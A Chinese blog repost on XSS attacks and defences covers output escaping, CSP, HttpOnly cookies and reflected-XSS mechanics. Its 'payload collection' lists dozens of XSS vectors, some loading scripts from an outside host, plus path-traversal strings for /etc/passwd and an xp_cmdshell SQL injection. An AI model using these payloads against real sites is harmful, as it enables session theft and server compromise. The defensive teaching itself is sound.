xss攻击和防范

最新推荐文章于 2022-01-02 14:12:33 发布
最新推荐文章于 2022-01-02 14:12:33 发布
阅读量294 收藏
点赞数
分类专栏: Web安全
原文链接:https://www.cnblogs.com/54chensongxia/p/11643787.html
版权

转载:
https://www.cnblogs.com/54chensongxia/p/11643787.html
https://blog.csdn.net/qw_xingzhe/article/details/80712840

防御:

A.PHP直接输出html的,可以采用以下的方法进行过滤:

1.htmlspecialchars函数
2.htmlentities函数
3.HTMLPurifier.auto.php插件
4.RemoveXss函数

B.PHP输出到JS代码中,或者开发Json API的,则需要前端在JS中进行过滤:

1.尽量使用innerText(IE)和textContent(Firefox),也就是jQuery的text()来输出文本内容
2.必须要用innerHTML等等函数,则需要做类似php的htmlspecialchars的过滤

C.其它的通用的补充性防御手段

1.在输出html时,加上Content Security Policy的Http Header
(作用:可以防止页面被XSS攻击时,嵌入第三方的脚本文件等)
(缺陷:IE或低版本的浏览器可能不支持)
2.在设置Cookie时,加上HttpOnly参数
(作用:可以防止页面被XSS攻击时,Cookie信息被盗取,可兼容至IE6)
(缺陷:网站本身的JS代码也无法操作Cookie,而且作用有限,只能保证Cookie的安全)
3.在开发API时,检验请求的Referer参数
(作用:可以在一定程度上防止CSRF攻击)
(缺陷:IE或低版本的浏览器中,Referer参数可以被伪造)

payload大全:

'><script>alert(document.cookie)</script>
 ='><script>alert(document.cookie)</script>
 <script>alert(document.cookie)</script>
 <script>alert(vulnerable)</script>
 %3Cscript%3Ealert('XSS')%3C/script%3E
 <script>alert('XSS')</script>
 <img src="javascript:alert('XSS')">
 %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
 %22%3cscript%3ealert(%22xss%22)%3c/script%3e
 %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
 %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
 %3f.jsp
 %3f.jsp
 <script>alert('Vulnerable');</script>
 <script>alert('Vulnerable')</script>
 ?sql_debug=1
 a%5c.aspx
 a.jsp/<script>alert('Vulnerable')</script>
 a/
 a?<script>alert('Vulnerable')</script>
 "><script>alert('Vulnerable')</script>
 ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
 %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 %3Cscript%3Ealert(document. domain);%3C/script%3E&
 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
 <IMG src="javascript:alert('XSS');">
 <IMG src=javascript:alert('XSS')>
 <IMG src=JaVaScRiPt:alert('XSS')>
 <IMG src=JaVaScRiPt:alert("XSS")>
 <IMG src=javascript:alert('XSS')>
 <IMG src=javascript:alert('XSS')>
 <IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 <IMG src="jav ascript:alert('XSS');">
 <IMG src="jav ascript:alert('XSS');">
 <IMG src="jav ascript:alert('XSS');">
 "<IMG src=java\0script:alert(\"XSS\")>";' > out
 <IMG src=" javascript:alert('XSS');">
 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
 <BODY BACKGROUND="javascript:alert('XSS')">
 <BODY ONLOAD=alert('XSS')>
 <IMG DYNSRC="javascript:alert('XSS')">
 <IMG LOWSRC="javascript:alert('XSS')">
 <BGSOUND src="javascript:alert('XSS');">
 <br size="&{alert('XSS')}">
 <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
 <LINK REL="stylesheet" href="javascript:alert('XSS');">
 <IMG src='vbscript:msgbox("XSS")'>
 <IMG src="mocha:[code]">
 <IMG src="livescript:[code]">
 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
 <IFRAME src=javascript:alert('XSS')></IFRAME>
 <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
 <TABLE BACKGROUND="javascript:alert('XSS')">
 <DIV STYLE="background-image: url(javascript:alert('XSS'))">
 <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
 <DIV STYLE="width: expression(alert('XSS'));">
 <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
 <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
 <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
 <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
 <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 <BASE href="javascript:alert('XSS');//">
 getURL("javascript:alert('XSS')")
 a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
 <XML src="javascript:alert('XSS');">
 "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
 <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
 <IMG src="javascript:alert('XSS')"
 <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
 <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
 <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>

反射型XSS的攻击步骤:

1.攻击者构造出特殊的URL,其中包含恶意代码.
2.用户打开有恶意代码的URL时,网站服务器端将恶意代码从URL取出,拼接在HTML返回给浏览器.
3.用户浏览器接收到响应后解析执行,混在其中的恶意代码也会被执行。
4.恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户行为,调用目标网站接口执行攻击者指定的操作。

请添加图片描述

防御反射型XSS攻击:

1.对输入检查:
对请求参数进行检查,一旦发现可疑的特殊字符就拒绝请求。需要注意的是用户可以绕过浏览器的检查,直接通过Postman等工具进行请求,所以这个检查最好前后端都做。

2.对输出进行转义再显示:
通过上面的介绍可以看出,反射型XSS攻击要进行攻击的话需要在前端页面进行显示。所以在输出数据之前对潜在的威胁的字符进行编码、转义也是防御XSS攻击十分有效的措施。比如下面的方式:

请添加图片描述

暮w光
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss攻击总结
hw1287789687的专栏
07-15 1541
xss攻击总结 原则用户输入什么,数据库就存储什么. 在前端显示时,需要escape.html标签的title属性也需要escape看一个title属性未escape得例子: html代码: 所以html标签的title属性也需要escape. 但是,如果使用jQuery的attr方法设置title,则不需要escape:setPreviewOrgFullName:function
如何防止XSS攻击
最新发布
m0_49521873的博客
05-23 6334
3. 设置HTTP头部:设置HTTP头部,包括Content-Security-Policy、X-Content-Type-Options、X-XSS-Protection等,来使浏览器拦截来自第三方资源的恶意脚本。4. 使用脚本过滤器:使用脚本过滤器,如Google的Closure Library和jQuery库等,能够对来自用户的数据进行过滤和检查。2. 转义特殊字符:在网页中用户输入的内容需要使用转义字符,例如将 < 转义成 <,将 > 转义成 >,避免浏览器将这些字符误解为标签等。
Web安全-JQuery框架XSS漏洞浅析
热门推荐
道阻且长,行则将至。
01-23 1万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具
Java-如何防止XSS攻击
了解➔熟悉➔掌握➔精通
01-02 7691
分享一个大牛的人工智能教程。零基础!通俗易懂!风趣幽默!希望你也加入到人工智能的队伍中来!请轻击http://www.captainbed.net XSS攻击通常指的是利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页的程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、VBScript、ActiveX、Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和co
JQuery在XSS攻击中的表现
甘焕的博客
11-29 1万+
在前端的XSS攻击中,直接运用innerHTML属性赋值,脚本绝不会被解析,代码如下:var html = '<script>alert(100)</script>'; // 里面的脚本绝不会执行,不会弹出100信息 document.body.innerHTML = html;1. $.html被轻松注入如果改用JQuery来实现,则出现了令人惊讶的结果,JS代码被轻松注入,代码如下:var h
Yii2的XSS攻击防范策略分析
10-21
主要介绍了Yii2的XSS攻击防范策略,较为详细的分析了XSS攻击的原理及Yii2相应的防范策略,需要的朋友可以参考下
防范XSS攻击程序
07-29
对用户输入的所有数据进行拦截,检测是否含有XSS攻击关键字,如果存在XSS攻击关键字,对一些特殊字符,如:“<”、“>”、“&”等进行转义。 实现方案 自定义一个Filter拦截器,使用 Filter来过滤浏览器发出的...
PHP和XSS跨站攻击防范
10-30
PHP和XSS跨站攻击防范
.net core xss攻击防御的方法
10-18
主要介绍了.net core xss攻击防御的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
web--xss:web安全之xss攻击、以及如何防范
05-18
web--xss web安全之xss攻击
javascript防止xss攻击
小丑鱼家的猪猪
06-11 7897
javascript防止xss攻击 XSS(Cross Site Scripting),跨站脚本攻击,是一种允许攻击者在另外一个用户的浏览器中执行恶意代码脚本的脚本注入式攻击。本来缩小应该是CSS,但为了和层叠样式(Cascading Style Sheet,CSS)有所区分,故称XSS。 记录一下自己开发过程中遇到的问题 输入标签不是用文本框或者文本域的,比如用用div做可编辑标签,ht...
如何防止XSS攻击
许文杰的博客
03-13 3703
  随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技...
简述XSS攻击及其防范措施
蜗牛先生
06-03 7394
只要功能不是太过单一的网站,就肯定会有需要用户输入的地方,即使是最简单的登录,也是需要用户输入的地方。 但是并不是每一个网站都对用户的输入进行了防范。 言外之意,用户的输入可能对网站的安全性构成威胁,这是怎么回事呢? 这就涉及到一个专业名词了:XSS。 ▍XSS(360百科) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表...
JSP过滤器防止Xss漏洞
Ac Dream
02-13 1万+
在用java进行web业务开发的时候,对于页面上接收到的参数,除了极少数是步可预知的内容外,大量的参数名和参数值都是不会出现触发Xss漏洞的字符。而通常为了避免Xss漏洞,都是开发人员各自在页面输出和数据入库等地方加上各种各样的encode方法来避免Xss问题。而由于开发人员的水平不一,加上在编写代码的过程中安全意识的差异,可能会粗心漏掉对用户输入内容进行encode处理。针对这种大量参数是不可能
jquery html方法xss,jQuery使用中可能被XSS攻击的一些危险环节提醒
weixin_32657693的博客
07-13 982
$我们经常使用向 $ 内传入一个字符串的方式来选择或生成 DOM 元素,但如果这个字符串是来自用户输入的话,那么这种方式就是有风险的。先看一个 DEMO:http://jsbin.com/duwuzonife/1/edit?html,js,output$("");当用户输入的字符串是像这样的时,虽然这个 元素不会马上被插入到网页的 DOM 中,但这个 DOM 元素已经被创建了,并且暂存在内存里。...
XSS 攻击 ----防止XSS 攻击
留着鼻涕敲代码
12-13 493
什么是XSS攻击 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击
防止 XSS 攻击 解决方案
浪子专栏
08-15 1万+
XSS又叫CSS英文缩写为Cross Site Script中文意思为跨站脚本攻击具体内容指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的. 解决方案 第一。过滤 过滤 标签 等字符 ,但是这样 对用户是不公平的。第二。用asii 码替换 如   ! 等   第三
js html代码转译防xss攻击
webmazha的博客
05-06 1833
function safeHtml(a){//转译html代码 var s=""; for(var i=0;ia.length;i++){ var arg=String(a); s=arg.replace(/&/g,"&").replace(/,"<").replace(/>/g,">"); console.log
反射型XSS攻击如何防范
05-09
为了防范反射型XSS攻击,可以采取以下几种措施: 1. 对用户输入的数据进行过滤和验证,包括对URL参数、表单数据、Cookie等数据进行过滤和验证,防止其中包含恶意代码。 2. 对输出到页面的数据进行转义,包括对特殊...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值